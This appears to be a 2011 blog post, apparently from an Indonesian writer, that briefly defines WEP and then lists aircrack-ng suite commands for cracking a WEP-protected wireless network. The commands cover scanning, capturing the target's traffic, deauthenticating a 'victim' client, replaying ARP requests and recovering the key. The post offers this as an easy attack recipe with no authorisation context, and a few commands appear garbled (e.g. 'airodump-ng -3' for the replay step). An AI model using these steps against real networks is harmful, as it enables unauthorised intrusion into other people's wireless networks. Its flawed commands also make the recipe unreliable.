Minggu, 16 Oktober 2011

The privacy protocol specified in IEEE 802.11 to provide wireless LAN users protection against casual eavesdropping. WEP refers to the intent to provide a privacy service to wireless LAN users similar to that provided by the physical security inherent in a wired LAN.

yesterday I was explaining about cracking WPA2. and now I will show you how easy it is to cracking WEP. let's we see....

[+]  search the target "airodump-ng mon0"

[+] dump with detail target "airodump-ng -w nameFile -c (channel) -bssid (mac target) mon0"

[+] deauthenticate the victim "aireplay-ng -0 1 -a (mac target) mon0
[+] save ARP-request packets of our victim "airodump-ng -3 -b (mac target)"

[+] if the packet which we have gathered enough, now time to crack using aircrack-ng...!!!
"aircrack-ng nameFile.cap"


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